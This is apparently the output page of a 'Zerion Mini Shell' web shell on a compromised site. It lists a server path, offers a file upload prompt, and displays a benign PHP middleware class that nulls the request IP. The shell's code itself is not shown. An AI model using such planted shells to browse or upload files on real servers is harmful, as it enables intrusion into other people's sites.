ok

Mini Shell

Direktori : /home2/selectio/public_html/a1tex.in/vendor/facade/flare-client-php/src/Middleware/
Upload File :
Current File : /home2/selectio/public_html/a1tex.in/vendor/facade/flare-client-php/src/Middleware/AnonymizeIp.php

<?php

namespace Facade\FlareClient\Middleware;

use Facade\FlareClient\Report;

class AnonymizeIp
{
    public function handle(Report $report, $next)
    {
        $context = $report->allContext();

        $context['request']['ip'] = null;

        $report->userProvidedContext($context);

        return $next($report);
    }
}

Zerion Mini Shell 1.0